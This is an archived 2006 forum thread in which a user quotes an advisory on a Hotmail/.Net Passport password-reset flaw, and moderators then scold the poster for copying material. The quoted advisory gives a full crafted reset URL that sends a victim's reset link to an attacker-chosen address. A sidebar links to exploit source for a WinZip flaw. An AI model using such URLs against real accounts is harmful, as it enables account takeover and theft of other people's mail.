Astahost.com   Mar 17, 2010
Open Discussion & Free Web Hosting > Computers & Tech > Security issues & Exploits

Password Reset Vulnerability

 		free web hosting
Open Discussion & Free Web Hosting > Computers & Tech > Security issues & Exploits

Password Reset Vulnerability

me-here
Apr 22 2006, 10:19 AM
is it working now...?

QUOTE
An attacker can reset any Microsoft Hotmail/.Net Passport user account
with no prior information like state, zip, country, answer to the secret
question and the old password. Normally, a user has to answer the
security questions and than answer the secret question if he wants to
reset his password. By exploiting this vulnerability, an attacker can
submit a specially crafted URL to get the password reset instructions
and reset any user?s password.

TECHNICAL DETAILS

Due to the nature of this vulnerability and the fact that there is no
fix available yet, no technical details are being made available with
this advisory. Full technical details will be made available on our
website once the vulnerability is fixed by Microsoft. Please note that
we were forced to release this information public as these
vulnerabilities are actively being exploited in the wild and are one of
the most severe vulnerabilities ever found in Microsoft Hotmail/.Net
Passport.


The flaw is exploited by opening the following URL in a web browser:

https://register.passport.net/emailpwdreset.srf?lc=1033
&em=victim@hotmail.com&id=&cb=&prefem=where-to@send-the-email.com&rst=

after that, URL which resets the password will be delivered, in this case, to where-to@send-the-email.com.

 

 

 


Comment/Reply (w/o sign-up)

miCRoSCoPiC^eaRthLinG
Apr 22 2006, 01:15 PM
For Gods sake, try and provide SOME ORIGINAL INPUT ON YOUR OWN PART. I'm getting tired of warning you and deleting such posts. Don't you have any goddamned opinion on anything on your own? Or do you simply specialize is posting quoted material from other sites?

Comment/Reply (w/o sign-up)

jlhaslip
Apr 22 2006, 10:49 PM
O.o, never seen M^E this mad before. Musta really got under his skin...

Comment/Reply (w/o sign-up)

Logan Deathbringer
Apr 24 2006, 05:51 AM
yes the ability to reset a password on the hotmail/msn network is possible, much like the quoted material you posted states. They are currently are working on, or have fixed, that problem already. As for how to do it, thats above my knowledge level, or to be more precise, not what I like to do for fun on my evenings off.

As for the post...I have to agree with M^E, of the couple of posts of yours that I have run across they are, umm...Juvenile at best, or in my opinion just this side of spam. Please feel free to contribute to the community, I would love to see you become a strong member here, but please don't post like this anymore, otherwise M^E, Moonwitch, or another of the mods might decide that banning might be the best option.

Comment/Reply (w/o sign-up)

Got an Opinion! Express your Views! (no registration):-
Add your Reply/ Opinion/ Views/ Comments/ Suggestion/ Questions/ Queries etc.
Posts with decent grammar & English will be accepted and please refrain from profanities.
For asking a Question, We recommend you to sign-up (for free) so that you can track the topic easily.
Nature of your Post*: Opinion/ Reply/ Comments
Question/Query
Feedback to us.
       
Name   Email
Title/Question*

This textarea will convert to Rich-Text automatically (IE, Firefox, Chrome)

Similar Topics

Keywords : password, reset, vulnerability

  1. Choosing An Extremely Secure Password - Examples
    (16)
  2. Never Give Out Your Password!
    For real (22)
    Here's a tip: NEVER GIVE YOUR PASSWORD OUT. Lols. Never. EVER. EVER. EVER. Unless you make it
    JUST for that. Also some people save chat logs, don't assume 'they just forgot it'.....
  3. Winzip ActiveX Control Remote Code Execution Vulnerability
    (2)
    QUOTE WinZip is prone to a remote code-execution vulnerability in an ActiveX control that is
    installed with the package. Exploiting this issue allows remote attackers to execute arbitrary
    machine code in the context of applications using the affected ActiveX control and possibly to
    compromise affected computers. WinZip versions in the 10.0 series prior to build 7245 are
    vulnerable to this issue. Here is an exploit source code :
    http://downloads.securityfocus.com/vulnera...-vs-MS-winzip.c used a shellcode that binds a port on
    4444. ....
  4. phpBB avatar_path PHP Code Execution Vulnerability
    (3)
    QUOTE The phpBB application is prone to an arbitrary PHP code-execution vulnerability. If
    successful, attackers can execute script code with the privileges of the webserver process.
    QUOTE Vulnerable: phpBB phpBB 2.0.21 phpBB phpBB 2.0.20 phpBB phpBB 2.0.18 Not Vulnerable:
    phpBB phpBB 2.0.22 So , upgrade to phpBB phpBB 2.0.22 .....
  5. MS Windows CSRSS Vulnerability
    (4)
    There's a vulnerability in MS Windows that may cause serious problems related with the module
    csrss.exe . Here below is listed vulnerable systems: QUOTE Microsoft Windows XP Tablet PC
    Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition
    Microsoft Windows XP Professional SP2 Microsoft Windows XP Professional SP1 Microsoft Windows XP
    Professional Microsoft Windows XP Media Center Edition SP2 Microsoft Windows XP Media Center Edition
    SP1 Microsoft Windows XP Media Center Edition Microsoft Windows XP Home SP2 Microsoft Wind....
  6. Microsoft Xmlhttp Activex Control Code Execution Vulnerability
    Extremely critical (0)
    Another vulnerability to XP has been found by Security research firm Secunia. QUOTE
    Description: A vulnerability has been reported in Microsoft XML Core Services, which can be
    exploited by malicious people to compromise a users system. The vulnerability is caused due to an
    unspecified error in the XMLHTTP 4.0 ActiveX Control. Successful exploitation allows execution of
    arbitrary code when a user e.g. visits a malicious website using Internet Explorer. NOTE: The
    vulnerability is already being actively exploited. QUOTE Solution: Microsoft has recommended
    va....
  7. Microsoft Confirms Wmf Vulnerability
    (7)
    Microsoft has issued a Security Advisory (912840) on 28 Dec. It concerns the recent WMF
    vulnerability exploit. Microsoft also gave a temp solution to protect your PC until they issue a
    patch. It's a good idea to use this before the patch comes out. The following is a quote from
    the Microsoft Security Advisory. QUOTE Un-register the Windows Picture and Fax Viewer
    (Shimgvw.dll) 1. Click Start, click Run, type "regsvr32 -u %windir%\system32\shimgvw.dll"
    (without the quotation marks), and then click OK. 2. A dialog box appears to confirm that the
    un-registr....
  8. Ms Sec. Advisory: Flash Player 7 Vulnerability
    (1)
    A vulnerability in Flash Player 7 has been identified by Macromedia. Microsoft urges users to apply
    a critical update from Flash Player update from Macromedia. This vulnerability affects Flash
    Player 7.0.19.0 and earlier. Flash Player (8.0.22.0) contains a fix for the vulnerability. If you
    have Flash Player 7 installed, it is the time to upgrade to this new version. It is very
    interesting. Microsoft is advising to upgrade an application that is not Microsoft's. But it is
    nice to see just how much MS is becoming dedicated with security. And the developer can m....
  9. Vulnerability Was Found In All Major Browsers
    Spoofing Flaw affect IE, Firefox, Safari (20)
    According eWeek.com, a new vulnerability was found in all the major Web browsers ( IE, Firefox,
    Safari). This Spoofing Flaw can be exploited by malicious hackers to trick surfers into disclosing
    confidential information. QUOTE "The problem is that JavaScript dialog boxes do not display or
    include their origin, which allows a new window to open a prompt dialog box, which appears to be
    from a trusted site," Here is the place for you to test your broswer whether vulnerable or not.
    http://secunia.com/multiple_browsers_dialo...erability_test/ source: http://www.e....
  10. Another Vulnerability Was Found In Firefox
    (8)
    http://secunia.com/advisories/14820/ It is about JavaScript Engin, This vulnerability is rated as
    Moderately critical. System information will be exposured to malicious people. Patch has not
    available yet. The vulnerability has been confirmed in versions 1.0.1 and 1.0.2 Does turning off
    the java script help in this suitation???? Firefox does has much user as IE, but more and more
    vulnerability are found. I remember that some people said firefox is the most securest internet
    browser. How about now??....


      11. Looking for password, reset, vulnerability



See Also,

*SIMILAR VIDEOS*
Searching Video's for password, reset, vulnerability
advertisement




Password Reset Vulnerability

Affordable Web Hosting, Low cost Web Hosting - ComputingHost.com



Creative Commons License